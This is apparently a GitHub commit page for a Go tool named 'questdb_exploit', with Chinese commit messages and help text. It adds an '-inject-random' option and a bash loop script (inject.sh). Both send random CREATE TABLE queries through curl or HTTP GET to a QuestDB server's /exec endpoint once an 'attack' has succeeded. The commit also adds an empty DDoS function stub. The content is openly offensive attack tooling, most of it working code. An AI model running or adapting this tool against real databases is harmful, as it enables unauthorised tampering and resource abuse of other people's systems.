feat: 新增随机表注入功能并扩展参数解析

ctkqiang · ctkqiang · commit a7e3ab4f7ebd · 2026-02-18T21:33:06.000+08:00
- 新增 `InjectRandom` 参数以支持攻击成功后随机注入表
- 实现 `InjectCreateTableRandomly` 函数，用于生成随机表名和列结构并执行注入
- 添加 `RandomChar` 工具函数以生成随机字符串
- 在 `main.go` 中集成随机表注入逻辑，根据命令行参数触发
- 更新命令行帮助信息，添加新参数说明和示例
diff --git a/internal/cmd/args.go b/internal/cmd/args.go
@@ -16,12 +16,15 @@ func ParseArgs() *model.Args {
 	flag.StringVar(&args.HistoryFilter, "history-filter", "", "过滤历史记录的主机名")
 	flag.IntVar(&args.HistoryLimit, "history-limit", 0, "限制显示的历史记录数量 (0 表示无限制)")
 	flag.BoolVar(&args.HistorySummary, "history-summary", false, "显示历史记录统计摘要")
+	flag.BoolVar(&args.InjectRandom, "inject-random", false, "在攻击成功后随机注入表")
 
 	flag.Usage = func() {
 		fmt.Fprintf(os.Stderr, "%s 的用法：\n", os.Args[0])
 		fmt.Fprintf(os.Stderr, "\n攻击模式:\n")
 		fmt.Fprintf(os.Stderr, "  -u string\n")
 		fmt.Fprintf(os.Stderr, "    \t目标 URL 或主机 (例如: http://localhost:9000）\n")
+		fmt.Fprintf(os.Stderr, "  -inject-random\n")
+		fmt.Fprintf(os.Stderr, "    \t在攻击成功后随机注入表\n")
 		fmt.Fprintf(os.Stderr, "\n历史记录查看模式:\n")
 		fmt.Fprintf(os.Stderr, "  -view-history\n")
 		fmt.Fprintf(os.Stderr, "    \t查看攻击历史记录\n")
@@ -33,6 +36,7 @@ func ParseArgs() *model.Args {
 		fmt.Fprintf(os.Stderr, "    \t显示历史记录统计摘要\n")
 		fmt.Fprintf(os.Stderr, "\n示例:\n")
 		fmt.Fprintf(os.Stderr, "  %s -u http://localhost:9000\n", os.Args[0])
+		fmt.Fprintf(os.Stderr, "  %s -u http://localhost:9000 -inject-random\n", os.Args[0])
 		fmt.Fprintf(os.Stderr, "  %s -view-history\n", os.Args[0])
 		fmt.Fprintf(os.Stderr, "  %s -view-history -history-filter localhost\n", os.Args[0])
 		fmt.Fprintf(os.Stderr, "  %s -view-history -history-limit 10\n", os.Args[0])
diff --git a/internal/functions/ddos.go b/internal/functions/ddos.go
@@ -0,0 +1,5 @@
+package functions
+
+func QDBDDOS(host string) {
+
+}
diff --git a/internal/functions/injection.go b/internal/functions/injection.go
@@ -0,0 +1,41 @@
+package functions
+
+import (
+	"fmt"
+	"math/rand"
+	"net/http"
+	"net/url"
+	"questdb_exploit/internal/utilities"
+	"strings"
+)
+
+func InjectCreateTableRandomly(host string) {
+	var (
+		colParts []string
+		colCount int = rand.Intn(20) + 2
+	)
+
+	for i := 0; i < colCount; i++ {
+		colName := utilities.RandomChar(rand.Intn(5) + 5)
+		colParts = append(colParts, fmt.Sprintf("%s INT", colName))
+	}
+
+	tableName := utilities.RandomChar(rand.Intn(9) + 2)
+	query := fmt.Sprintf(
+		"CREATE TABLE %s (%s);",
+		tableName,
+		strings.Join(colParts, ", "),
+	)
+
+	url := host + "/exec?query=" + url.QueryEscape(query)
+
+	resp, err := http.Get(url)
+	if err != nil {
+		fmt.Printf("注入表 %s 失败: %v\n", tableName, err)
+		return
+	}
+
+	defer resp.Body.Close()
+
+	fmt.Printf("已注入表: %s (状态: %s)\n", tableName, resp.Status)
+}
diff --git a/internal/model/arguements.go b/internal/model/arguements.go
@@ -6,4 +6,5 @@ type Args struct {
 	HistoryFilter  string
 	HistoryLimit   int
 	HistorySummary bool
+	InjectRandom   bool
 }
diff --git a/internal/utilities/util.go b/internal/utilities/util.go
@@ -0,0 +1,15 @@
+package utilities
+
+import "math/rand"
+
+func RandomChar(length int) string {
+	const charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
+
+	b := make([]byte, length)
+
+	for i := range b {
+		b[i] = charset[rand.Intn(len(charset))]
+	}
+
+	return string(b)
+}
diff --git a/main.go b/main.go
@@ -56,4 +56,10 @@ func main() {
 	}
 
 	utilities.Log(utilities.INFO, "漏洞利用执行完成")
+
+	if args.InjectRandom {
+		utilities.Log(utilities.INFO, "开始随机表注入")
+		functions.InjectCreateTableRandomly(args.TargetURL)
+		utilities.Log(utilities.INFO, "随机表注入完成")
+	}
 }
diff --git a/scripts/inject.sh b/scripts/inject.sh
@@ -0,0 +1,61 @@
+#!/bin/bash
+
+# 默认值
+HOST="localhost"
+LOOP=1
+
+# 解析命令行参数
+# u: 表示 -u 需要参数, l: 表示 -l 需要参数
+while getopts "u:l:" opt; do
+  case $opt in
+    u) HOST="$OPTARG" ;;
+    l) LOOP="$OPTARG" ;;
+    *) echo "用法: sh inject.sh -u <主机地址> -l <循环次数>"; exit 1 ;;
+  esac
+done
+
+# 随机表注入函数
+inject_table() {
+    local target_host=$1
+    
+    # 生成随机表名 (5-10个字符)
+    local t_len=$(( ( RANDOM % 6 ) + 5 ))
+    local table_name="tbl_$(openssl rand -base64 32 | tr -dc 'a-z' | fold -w "$t_len" | head -n 1)"
+    
+    # 生成随机列数 (2-10列)
+    local col_count=$(( ( RANDOM % 9 ) + 2 ))
+    local col_parts=()
+    
+    for ((i=0; i<col_count; i++)); do
+        local c_name=$(openssl rand -base64 32 | tr -dc 'a-z' | fold -w 5 | head -n 1)
+        col_parts+=("$c_name INT")
+    done
+    
+    # 将数组组合成 SQL 格式
+    local joined_cols=$(IFS=,; echo "${col_parts[*]}")
+    local query="CREATE TABLE $table_name ($joined_cols);"
+
+    # 执行 curl 请求
+    # --data-urlencode 会自动处理 SQL 中的空格和括号
+    local url
+    if [[ "$target_host" == http* ]]; then
+        url="$target_host/exec"
+    else
+        # 否则使用默认的 http 协议和 9000 端口
+        url="http://$target_host:9000/exec"
+    fi
+    
+    local status=$(curl -s -o /dev/null -w "%{http_code}" \
+        --data-urlencode "query=$query" \
+        "$url")
+
+    echo "[$(date +%T)] 正在注入表: $table_name | 状态码: $status"
+}
+
+# 开始循环
+echo "正在对 $HOST 开始注入，共执行 $LOOP 次..."
+for ((i=1; i<=LOOP; i++)); do
+    inject_table "$HOST"
+done
+
+echo "任务完成。"

-Original file line number
+Diff line change
@@ @@ -0,0 +1,5 @@ @@
 +package functions
++
 +func QDBDDOS(host string) {
++
 +}
Original file line number	Diff line number	Diff line change
`@@ -6,4 +6,5 @@ type Args struct {`
`6`	`6`	`HistoryFilter string`
`7`	`7`	`HistoryLimit int`
`8`	`8`	`HistorySummary bool`
	`9`	`+ InjectRandom bool`
`9`	`10`	`}`
Original file line number	Diff line number	Diff line change
`@@ -56,4 +56,10 @@ func main() {`
`56`	`56`	`}`
`57`	`57`
`58`	`58`	`utilities.Log(utilities.INFO, "漏洞利用执行完成")`
	`59`	`+`
	`60`	`+ if args.InjectRandom {`
	`61`	`+ utilities.Log(utilities.INFO, "开始随机表注入")`
	`62`	`+ functions.InjectCreateTableRandomly(args.TargetURL)`
	`63`	`+ utilities.Log(utilities.INFO, "随机表注入完成")`
	`64`	`+ }`
`59`	`65`	`}`